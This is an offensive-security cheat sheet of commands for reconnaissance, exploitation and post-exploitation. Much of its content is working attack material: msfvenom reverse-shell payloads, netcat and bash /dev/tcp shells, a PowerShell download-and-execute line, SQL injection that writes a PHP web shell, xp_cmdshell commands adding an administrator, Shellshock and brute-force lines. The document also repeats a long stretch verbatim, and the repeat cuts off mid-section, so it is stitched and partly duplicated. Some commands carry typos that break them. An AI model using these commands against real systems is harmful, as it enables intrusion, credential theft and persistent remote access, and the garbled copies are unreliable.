Recon/Information Gathering
Goggle Search
Extract ip from host command
Extract domain from index.html
Netdiscover
Nmap explain closed,filtered
Nmap examples
Nmap Scripts
Search for NMAP scripts
Nmap – Options
Nmap – Combos
Portscaning with Netcat
Hping3
Ping and portscan from shell
Gobuster
Dirb
dirb http://10.10.10.1 /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Curl
curl –url “imap://mail.example.com/” –user “bobby:tables”
Upload
curl –upload-file file.txt -v –url <url> -0 –http1.0
Cewl
Find words on webpages that can be used for password crack.
cewl http://www.site.se -m 6 -w /cewl.txt
Can then be passed to John The Ripper
Directory or Path Traversal
192.168.1.1/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd
Null Byte
?page=../../../../../etc/passwd%00
Wpscan
wpscan –u http://10.1.1.1/ –enumerate t –enumerate t –enumerate u
wpscan -u http://10.1.1.1 -e –log tenten_wpscan.txt
wpscan –url <url> Scan cms
wpscan –url <url> –enumerate vp (Scan plugins)
wpscan –url <url> –enumerate ut (scan Themes)
wpscan –url <url> –enumerate u (Enumerate Users)
wpscan –url <url> –wordlist pass.txt threats 50 (BruteForse)
Metagoofil
metagoofil.py -d apple.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html
Nikto
nıkto -h 10.1.1.1
Drupe scan
./droopescan scan drupal -u http://192.168.2.152
Dns
nslookup
server 10.10.10.100
host -t ns domain.se
host -t mx domain.se
host http://www.domain.se
Zonetransfer
host -t axfr domain.se ns1.domain.se
host -l domain.se 10.1.1.1
zone transfers
host -l server.se ns3.server.se.
Reverse DNS
theharvester -n -d host.se -b all
Dnsenum
dnsenum domain.se
Dnsrecon
dnsrecon -d 10.10.10.100 -r 10.0.0.0/8
Smtp
vrfy
for user in $(cat users.txt); do echo VRFY $user |nc -nv -w 192.168.1.1 25 2>/dev/null | grep ^”250″;done
Python script to vrfy
python
#!/usr/bin/python
import socket
import sys
if len(sys.argv) !=2:
print “Usage: vrfy.py <username>”
sys.exit(0)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((‘127.0.0.1’,25))
print banner
s.send(‘VRFY ‘ + sys.argv[1] + ‘r\n\’
result=s.recv(1024)
print result
s.close()
Smb
Rpcclient
Old
rpcclient -U roger 192.168.1.1
srvinfo
enumdomusers
enumalsgroups domain
lookupnames administrators
querydominfo
enumdomusers
queryuser roger
Nbtscan
nbtscan -f target
nbtscan -v verbose
Smb enumeration
Enum4linux -a 192.168.1.1
Smb nmap
nmap –script=vuln 192.1681.1 -p445
Smbclient
Look for shares
smbclient -L //10.10.10.100 -U name
smbclient \\\\192.168.1.1\\Share -W DOMAIN -U roger
Smbmap
Locate Shares:
smbmap -H 10.10.10.100
List Files on Share
smbmap -R Replication -H 10.10.10.100
List Files
smbmap -R Replication -H 10.10.10.100 -A Groups.xml -q
smbmap -u username -p ‘HASH:HASH’ -H 192.168.1.1 -R –download path/pathtofile.xt
–download Download file with smbmap
Smbclient
smbclient //10.10.10.100/Replication
recurse ON
prompt OFF
mget *
Smb impacket
/usr/share/doc/python-impacket/examples/GetADUsers.py -all domain.dc/svc_user -dc-ip 10.10.10.1
/usr/share/doc/python-impacket/examples/psexec.py domain.dc/[email protected]
smbmap -d domain.dc -u svc_user -p password -H 10.10.10.1
/usr/share/doc/python-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.1 domain.dc/svc_user
/usr/share/doc/python-impacket/examples/psexec.py domain.dc/[email protected]
-R ‘List file
Password from GPO Policy
less /usr/share/smbmap/10.1.1.1/Replication_domain.dc_Policies_\{31B2F340-016D-11D2-945F-00C0aFB984F9\}_MACHINE_Preferences_Groups_Groups.xml
edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJa3mjWA98ga9guKOhaOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
PASSWORDWITH_gpp-decrypt
Windows Tips
Run as command
runas /netonly /user:domain.dc\svc_user cmd
Windows Credentials Editor (WCE)
wce64.exe -w
Sharphound
SharpHound.exe -c all -d domain.dc –domaincontroller 10.10.1.1
Find files Windows
where /R C:\ bash.exe
Getting Access and Maintaining Acccess
Searchsploit
Mirror down
searchsplit -m exploits/php/webapps/18650.py
searchsploit -x exploits/php/webapps/18650.py
searchsploit -p exploits/php/webapps/18650.py
Metasploit
Start databas
service postgresql start
Start Metasploit
msfconsole -q
exit backround session ctrl z or type background
exploit -j
sessions -i
sessions l
setg = global value ex. setg RHOST 192.168.1.1
Metaexploit Steps
mfsconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST ip
SET LPORT port
exploit -j
Access the exploit
shell.aspx
shell
systeminfo
search suggest exploits
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
use exploit/windows/local/ms10_015_kitrap0d
set lhost ip
set lport port
Create Payloads
Msfvenom
Linux
msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.1 LPORT=4444 SHELL=/bin/bash -a cmd –platform Unix -e generic/none
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f elf > shell.elf
Windows
msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.1 lport=8888 –f exe > /root/Desktop/1.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f macho > shell.macho
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
msfvenom -p php/meterpreter_reverse_tcp lhost=10.10.14.10 LPORT=4444 > r2.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f war > shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.1 LPORT=444 -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.1 LPORT=444 -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.1 LPORT=444 -f raw > shell.pl
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Unicorn
Create Payload
python unicorn.py windows/meterpreter/reverse_http 10.1.1.1 8001
Use exploit and create payload
Exploit:
chmod 755 cve-2017-8759_toolkit.py
Create Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=6996 -f exe > /tmp/gotcha.exe
Create rtf file from exploit
python cve-2017-8759_toolkit.py -M gen -w Gotcha.rtf -u http://192.168.1.101/gotcha.txt
Host The Payload on our server
python cve-2017-8759_toolkit.py -M exp -e http://192.168.1.101/gotcha.exe -l /tmp/gotcha.exe
Mini webserver with python
python -m SimpleHTTPServer 80
Filedownload
PowerShell
powershell IEX(new-object net.webclient).downloadstring(‘http://10.1.1.10/empire.ps1‘)”
Linux
wget 192.168.1.1:80/attack.txt
curl 192.168.1.1:80/attack.txt > file.txt
fetch http:// 192.168.1.1:80/attack.txt
Victim > Attacker
nc -lvp 4444 > file.txt
nc 192.168.1.1 4444 < file.txt
Attacker > Victim
Target
nc -nvlp 81 > file.txt
Attacker
nc 192.268.1.1. 82 < file.txt
Netcat
Victim:
nc -lvnp 4444 > incomming.exe
Source:
nc -nv 10.0.2.15 4444 </usr/share/windows-binaries/wget.exe
Windows
Tftp
Server
atftpd -v –port 69 –bind-address 10.10.10.2 –daemon /srv/tftp/
Client
tftp -i 192.168.1.1 GET nc.exe
Ftp
On Windows you can script this with a text file
ftp -s ftp.txt
Ftp 192.168.1.1.1
ls
get nc.exe
put nc.exe
set binary
Reverse Shell
Netcat
Ncat to get support for ssl and rules
Listener
nc -lvnp 4444
Connector
nc -nv 192.168.1.1 25
Netcat Command execution
Victim
nc -lvnp 4444 -e /bin/bash
Source
nc -nv 10.0.2.15 4444
Netcat Windows to get PowerShell shell
nc64.exe 10.1.1.1 9001 -e powershell
Shell from dash or bad shell
Attacker:
nc -nlvp 9001
Victim
bash -c ’bach -i >& /dev/tcp/192.168.1.1/9001 0>&1’
You get shell on Attacker then
python -c ‘import pty; pty.spawn(“/bin/bash”)’
After that
script -q /dev/null
Then backround
ctrl z
Then type
stty raw -echo
Then hit fg for foreground
OpenSSH
Create Cert
openssl req -x509 -newkey
rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Start the Listener on Attacker
openssl s_server -quiet
-key key.pem -cert cert.pem -port 4444
Start reverse shell on victim with openssl
mkfifo /tmp/s; /bin/sh -i <
/tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.1.1. >
/tmp/s; rm /tmp/s
ASPX
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f aspx -o shell.aspx
PHP
Create s.php
/*s.php*/
<?php echo shell_exec($_GET[‘cmd’]);?>
Copy nc.exe and s.php to web folder
http://10.10.10.1/s.php?cmd=nc 10.10.14.10 4444 -e cmd
wget 10.1.1.1:80/php-reverse-shell.txt -P /var/www/admin/
mv /var/www/admin/php-reverse-shell.txt /var/www/admin/php-reverse-shell.php
Nice remote shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’
set TERM=linux
No real bash
ctrl z
background
stty raw -echo
fg
Password
Responder
Set up responder to listen to clients and capture hashes
responder
•Default location: “/usr/share/responder/”
•Stores hashes in Responder.db
Captures password hashes you can crack with John The Ripper
Capture LTM hashes from sql injection
Start smb server On Attacker
impacket-smbserver share $(pwd)
Use this on the webpage:
; use master; exec xp_dirtree ‘\\10.1.1.1\share’;–
Unshadow
sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > ~/passwords.txt
HASHCAT
hashcat -h | grep -i ntlm
hashcat -m 3100 haches.txt /opt/share/wordlist/rocky.txt
to launch a combination attack against MD5 password hashes
hashcat -m 0 -a 1 /root/hashes/hashes.txt /root/rockyou.txt
a straight through attack is super fast on simple passwords
hashcat -m 0 -a 0 /root/hashes/hashes.txt /root/rockyou.txt
John The Ripper
john hashes.txt -format=nt -show (CrackNTLM)
use the cewel.txt in john the ripper to
john –wordlist=cvewl.txt –rules –stdout > pass.txt
john –wordlist:/usr/share/wordlists/rockyou.txt
RSA
Now we need to convert the rsa key to john format and save it in a file:
#root@kali: ssh2john rsakey > rsa2johnfile
Now crack the passphrase using any wordlist:
#root@kali: john –wordlist=/usr/share/wordlists/rockyou.txt –format=SSH rsa2johnfile
When it’s done, you can show the password if it has been cracked by issuing the following command:
#root@kali: john –show rsa2johnfile
Passwords dumps Windows
Pwdump and FGdump
crunch Create Passwordlists
crunch 6 6 01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ
Passing The Hash
Passing the hash
pth-*
export SMBHASH=1231234124124124124:1243124124124124124124124
pth-winexe -U administrator% //192.168.1.1 cmd
Medusa
medua -h 192.168.1.1. -u admin -P password.txt -M http -m DIR:/admin -T 20
Ncrack
use for rdp brute force
ncrack -v -f –user administrator -P password.txt rdp//192.168.1.1,CL1
Hydra
hydra -l root -P /usr/share/wordlists/rockyou.txt -u -s 22 10.1.1.1 ssh
hydra 10.1.1.1 -V -l user -P /usr/share/wordlists/rockyou.txt http-get-form “/login.php:username=^USER^&password=^PASS^&Login=Login:F=The password you entered was not valid.:H=Cookie: PHPSESSID=2tr9o96unnmlrgfom8hbaqhp7l; security=low”
hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form “/:password=^PASS^:Invalid password!” -s 54415 -I
MySQL
Connect to local database
mysql -u zabbix -D zabbixdb -p
Sqlmap
Use burpsuite to capture login request
Save login request to login.req
sqlmap r login.req –level 5
Search for databases
sqlmap –u http://192.168.1.1/index.php?par= –dbs
Checking privileges of the users in database
sqlmap –u 192.168.1.124/sqli/Less-1/?id=1 –privileges
Reading a file from the web server
sqlmap -u 192.168.1.124/sqli/Less-1/?id=1 –file-read=/xampp/htdocs/index.php –batch
Dump Username and Password
sqlmap -u http//192.168.1.1/comment.php?id123 –dbms=mysql –dump -threads=5
Dump tables
sqlmap –u http://192.168.1.1/index.php?par= –dbs –D dbname –tables –-dump
sqlmap –u http://192.168.1.1/index.php?par= –dbs –D dbname –T tablename –-dump
Automated Shell
sqlmap -u http//192.168.1.1/comment.php?id123 –dbms=mysql –os-shell
sqlmap -u http://10.1.1.1/login.php –forms –level 5 –risk 3 –string “The password you entered was not valid.” –dbs –batch
sqlmap -l trace.txt –dbs (RDBMS Enum)
sqlmap -l trace.txt -D <db> –tables (Dump tables)
sqlmap -l trace.txt -D <db> -T <table> –dump (Dump table content)
Crawl links
sqlmap -u http://192.168.1.1 –crawl=1
sqlmap -u http:// 192.168.1.1 –forms –batch –crawl=5 –cookie=jsessionid=1234 –level=5 –risk=3
Dev Console, find Cookie, search "document.cookie"
sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” --cookie=<”cookie value which you have copied in step #5”> --dbs
sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” --cookie=<”cookie value which you have copied in step #5”> -D moviescope --tables and press Enter.
sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” --cookie=<”cookie value which you have copied in step #5”> -D moviescope -T User_Login --columns and press Enter
Manual sql injection commands
Check for sqli vulnerability
?id=1′
Find the number of columns
?id=1 order by 9 — –
Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8,9 — –
Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8,9 — –
Get version
?id=1 union select 1,2,3,4,version(),6,7,8,9 — –
Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables — –
Get all columns from a specific table
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = ‘users’ — –
Get content from the users-table. From columns name and password. (The 0x3a only servers to create a delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users
Read file
?id=1 union select 1,2,3,4, load_file(‘/etc/passwd’) ,6,7,8,9 — –
?id=1 union select 1,2,3,4, load_file(‘/var/www/login.php’) ,6,7,8,9 — –
Create a file and call it to check if really created
?id=1 union select 1,2,3,4,’this is a test message’ ,6,7,8,9 into outfile ‘/var/www/test’ — –
?id=1 union select 1,2,3,4, load_file(‘/var/www/test’) ,6,7,8,9 — –
Create a file to get a shell
?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>’ ,6,7,8,9 into outfile ‘/var/www/shell.php’ — –
?id=1 union select null,null,null,null, load_file(‘/var/www/shell.php’) ,6,7,8,9 — –
Then go to browser and see if you can execute commands
http://<targetip>/shell.php?cmd=id
Sql injections
User name
Password
SQL Query
tom
tom
SELECT * FROM users
WHERE name=’tom’
and password=’tom’
tom
‘ or ‘1’=’1
SELECT * FROM users
WHERE name=’tom’
and password=” or ‘1’=’1′
tom
‘ or 1=’1
SELECT * FROM users
WHERE name=’tom’
and password=” or 1=’1′
tom
1′ or 1=1 — –
SELECT * FROM users
WHERE name=’tom’
and password=” or 1=1— -‘
‘ or ‘1’=’1
‘ or ‘1’=’1
SELECT * FROM users
WHERE name=” or ‘1’=’1′
and password=” or ‘1’=’1′
‘ or ‘ 1=1
‘ or ‘ 1=1
SELECT * FROM users
WHERE name=” or ‘ 1=1’
and password=” or ‘ 1=1’
1′ or 1=1 — –
blah
SELECT * FROM users
WHERE name=’1′ or 1=1 — -‘
and password=’blah’
‘or 1=1#
‘ or ‘1’=’1
blah';insert into login values ('john','apple123'); --
Command injections
;ls
sqsh – Interactive database shell for Sybase
Login
sqsh -S 127.0.0.1:123 -U sa -P secretpassword
exec xp_cmdshell ‘whoami’
go
exec xp_cmdshell ‘net user roger pass /add’
go
exec xp_cmdshell ‘net localgroup Administrators roger /add’
go
exec xp_cmdshell ‘net localgroup “Remote Desktop Users” roger /add’
go
Shellshock with Burpsuite
User-Agent: () { :; }; bash -i >& /dev/tcp/10.10.14.1/8081 0>&1
Snmp
snmpwalk 10.1.1.1 -c public -v 2c
onesixtyone
HEX to TXT and Back
xxd -ps fil.txt > fil.txt.hex
vi fil.txt.hex
xxd -r -ps fil.txt.hex > fil.txt
Stego and Strings
steghide –extract -sf ./Granted.jpg
binwalk -e
java -jar Stegsolve.jar
strings ./HackerAccessGranted.jpg
Stego Links
https://www.dcode.fr/caesar-cipher
https://www.splitbrain.org/_static/ook/
https://incoherency.co.uk/image-steganography/#unhide
Magic Numbers
hex to bin
xxd -r hashdump.txt hex.bz2
Links
https://en.wikipedia.org/wiki/List_of_file_signatures
Base64 encode decode
base64 filename.exe > file.txt
base64 -d file.txt > filename.exe
Base64 command and execute
echo ls /home | base64
bHMgL2hvbWUK
echo bHMgL2hvbWUK | base64 -d | bash
ProxyChains
Comming
Chisel
TCP tunnel over HTTP
https://github.com/jpillora/chisel.git
Attacker
chisel server -p 8000 -reverse -v
Client (Victim)
chisell client 172.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80
Windows Privilage Escalation
systeminfo
hostname
echo %username%
net users
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule all
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:”KB..” /C:”KB..”
Sysinternals
accesschk.exe
net start
net stop
Registry Checks for Passwords
reg query HKLM /f password /t REG_SZ /s >pass.txt
reg query HKCU /f password /t REG_SZ /s >pass.txt
C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir /b /s vnc.ini
Find writable files
dir /a-r-d /s /b
Empire Setup
git clone https://github.com/EmpireProject/Empire.git -b dev
cd Empire
cd setup
setup.sh
PowerShell
Invoke-AllChecks
Linux Privilege Escalation
The things that I have used from this page is:
# Sticky bit – Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -1000 -type d 2>/dev/null
# SGID (chmod 2000) – run as the group, not the user who started it.
find / -perm -g=s -type f 2>/dev/null
# SUID (chmod 4000) – run as the owner, not the user who started it.
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r “bin$”`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in ‘common’ places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
LinEnum
./LinEnum.sh -t > kali.txt
Commands
cat /etc/issue
cat /etc/lsb-release
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ps aux | grep root
crontab -l
Port forward
ssh -L 8080:127.0.0.1:80 [email protected]
ssh -R 8080:127.0.0.1:80 [email protected]
Binary Exploitation
Tools
OllyDebuger
Immunity Debugger
gdb
Binary Ninja
Stacks
Buffers
Fuzzing
Registers
EAX
ECX
EDX
EBX
ESP
EBP
ESI
EDI
EIP Control the path of Code execution
Debug Applications
r2
aaa (Analyse all)
afl (List funtions)
pdf @ main
pdc @main as c code
ldd list libarary to an application
ldd /usr/
Ruby pattern create tool
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
Ruby mach was was found in the EIP
/usr/share/metaspoit-framwork/tools/pattern_offset.rb
Ruby find jmp esp
/usr/share/metaspoit-framwork/tools/nasm_shell.rb
JMP ESP
Shrink Go Binaries
Shrink go binaries
go build -ldfkags=”-s -w”
and
upx brute chisel
Tcp dump icmp packets
tcpdump -i eth0 icmp -n
Covering Tracks
Metasploit
Linux tips and tricks
Updatedb
Update database for mlocate
updatedb
Count characters
echo -n asjdflkjalskdjflkjasdfljldkf | wc -c
md5sum
echo -n ’ asjdflkjalskdjflkjasdfljldkf’ | md5sum
Run a command immune to hangups
nohup
Wireless
### Check Config
iwconfig
### Enable Monitoring
airmon-ng start
iwconfig
### Looking for AP
airodump-ng wlan0mon
### Looking for Clients
airodump-ng –bssid <ap> –channel <ap channel> wlan0mon
### Start Recording
airodump-ng –bssid <ap> –channel <ap channel> –showack -w wpa_log wlan0mon
### Deauth
airplay-ng -0 20 -a <ap> -c <client> wlan0mon
## Crack
aicrack-ng wpa_log.cpa -w usr/share/wordlist/rockyou.txt
Links
Exploits
https://www.exploit-db.com/google-hacking-database
John The Ripper
https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c
Linux Priv Escalation
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Magic Numbers
https://en.wikipedia.org/wiki/List_of_file_signatures
Stego Links
https://www.dcode.fr/caesar-cipher
https://www.splitbrain.org/_static/ook/
https://incoherency.co.uk/image-steganography/#unhide
Github tools
0d1n
Door404
Hacking-Tools-Repository
massExpConsole
routersploit
Sublist3r
airgeddon
DorkMe
hashcat-legacy
metagoofil
scavenger
takeover
aron
droopescan
hashstack-server-plugin-jtr
nemesis
SecLists
TheFatRat
AutoSploit
EagleEye
InSpy
osint-scraper
seeker
Trity
badKarma
Eternalblue-Doublepulsar-Metasploit
Leaked
osrframework
SharpHound
wordlist
Bashark
exploitpack-master
linpostexp
Photon
SiteBroker
wpscan
BloodHound
firesheep
Log-killer
PowerSploit
SocialBox
xerxes
Cl0neMast3r
fuxploider
lscript
pywerview
SocialFish
Cortex-Analyzers
Gopherus
machine_learning_security
ReconDog
sshng2john
DarkSpiritz
hackbox
mail-security-tester
RED_HAWK
stash.sqlite
Goggle Search
Extract ip from host command
Extract domain from index.html
Netdiscover
Nmap explain closed,filtered
Nmap examples
Nmap Scripts
Search for NMAP scripts
Nmap – Options
Nmap – Combos
Portscaning with Netcat
Hping3
Ping and portscan from shell
Gobuster
Dirb
dirb http://10.10.10.1 /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Curl
curl –url “imap://mail.example.com/” –user “bobby:tables”
Upload
curl –upload-file file.txt -v –url <url> -0 –http1.0
Cewl
Find words on webpages that can be used for password crack.
cewl http://www.site.se -m 6 -w /cewl.txt
Can then be passed to John The Ripper
Directory or Path Traversal
192.168.1.1/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd
Null Byte
?page=../../../../../etc/passwd%00
Wpscan
wpscan –u http://10.1.1.1/ –enumerate t –enumerate t –enumerate u
wpscan -u http://10.1.1.1 -e –log tenten_wpscan.txt
wpscan –url <url> Scan cms
wpscan –url <url> –enumerate vp (Scan plugins)
wpscan –url <url> –enumerate ut (scan Themes)
wpscan –url <url> –enumerate u (Enumerate Users)
wpscan –url <url> –wordlist pass.txt threats 50 (BruteForse)
Metagoofil
metagoofil.py -d apple.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html
Nikto
nıkto -h 10.1.1.1
Drupe scan
./droopescan scan drupal -u http://192.168.2.152
Dns
nslookup
server 10.10.10.100
host -t ns domain.se
host -t mx domain.se
host http://www.domain.se
Zonetransfer
host -t axfr domain.se ns1.domain.se
host -l domain.se 10.1.1.1
zone transfers
host -l server.se ns3.server.se.
Reverse DNS
theharvester -n -d host.se -b all
Dnsenum
dnsenum domain.se
Dnsrecon
dnsrecon -d 10.10.10.100 -r 10.0.0.0/8
Smtp
vrfy
for user in $(cat users.txt); do echo VRFY $user |nc -nv -w 192.168.1.1 25 2>/dev/null | grep ^”250″;done
Python script to vrfy
python
#!/usr/bin/python
import socket
import sys
if len(sys.argv) !=2:
print “Usage: vrfy.py <username>”
sys.exit(0)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((‘127.0.0.1’,25))
print banner
s.send(‘VRFY ‘ + sys.argv[1] + ‘r\n\’
result=s.recv(1024)
print result
s.close()
Smb
Rpcclient
Old
rpcclient -U roger 192.168.1.1
srvinfo
enumdomusers
enumalsgroups domain
lookupnames administrators
querydominfo
enumdomusers
queryuser roger
Nbtscan
nbtscan -f target
nbtscan -v verbose
Smb enumeration
Enum4linux -a 192.168.1.1
Smb nmap
nmap –script=vuln 192.1681.1 -p445
Smbclient
Look for shares
smbclient -L //10.10.10.100 -U name
smbclient \\\\192.168.1.1\\Share -W DOMAIN -U roger
Smbmap
Locate Shares:
smbmap -H 10.10.10.100
List Files on Share
smbmap -R Replication -H 10.10.10.100
List Files
smbmap -R Replication -H 10.10.10.100 -A Groups.xml -q
smbmap -u username -p ‘HASH:HASH’ -H 192.168.1.1 -R –download path/pathtofile.xt
–download Download file with smbmap
Smbclient
smbclient //10.10.10.100/Replication
recurse ON
prompt OFF
mget *
Smb impacket
/usr/share/doc/python-impacket/examples/GetADUsers.py -all domain.dc/svc_user -dc-ip 10.10.10.1
/usr/share/doc/python-impacket/examples/psexec.py domain.dc/[email protected]
smbmap -d domain.dc -u svc_user -p password -H 10.10.10.1
/usr/share/doc/python-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.1 domain.dc/svc_user
/usr/share/doc/python-impacket/examples/psexec.py domain.dc/[email protected]
-R ‘List file
Password from GPO Policy
less /usr/share/smbmap/10.1.1.1/Replication_domain.dc_Policies_\{31B2F340-016D-11D2-945F-00C0aFB984F9\}_MACHINE_Preferences_Groups_Groups.xml
edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJa3mjWA98ga9guKOhaOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
PASSWORDWITH_gpp-decrypt
Windows Tips
Run as command
runas /netonly /user:domain.dc\svc_user cmd
Windows Credentials Editor (WCE)
wce64.exe -w
Sharphound
SharpHound.exe -c all -d domain.dc –domaincontroller 10.10.1.1
Find files Windows
where /R C:\ bash.exe
Getting Access and Maintaining Acccess
Searchsploit
Mirror down
searchsplit -m exploits/php/webapps/18650.py
searchsploit -x exploits/php/webapps/18650.py
searchsploit -p exploits/php/webapps/18650.py
Metasploit
Start databas
service postgresql start
Start Metasploit
msfconsole -q
exit backround session ctrl z or type background
exploit -j
sessions -i
sessions l
setg = global value ex. setg RHOST 192.168.1.1
Metaexploit Steps
mfsconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST ip
SET LPORT port
exploit -j
Access the exploit
shell.aspx
shell
systeminfo
search suggest exploits
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
use exploit/windows/local/ms10_015_kitrap0d
set lhost ip
set lport port
Create Payloads
Msfvenom
Linux
msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.1 LPORT=4444 SHELL=/bin/bash -a cmd –platform Unix -e generic/none
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f elf > shell.elf
Windows
msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.1 lport=8888 –f exe > /root/Desktop/1.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f macho > shell.macho
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
msfvenom -p php/meterpreter_reverse_tcp lhost=10.10.14.10 LPORT=4444 > r2.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f war > shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.1 LPORT=444 -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.1 LPORT=444 -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.1 LPORT=444 -f raw > shell.pl
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Unicorn
Create Payload
python unicorn.py windows/meterpreter/reverse_http 10.1.1.1 8001
Use exploit and create payload
Exploit:
chmod 755 cve-2017-8759_toolkit.py
Create Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=6996 -f exe > /tmp/gotcha.exe
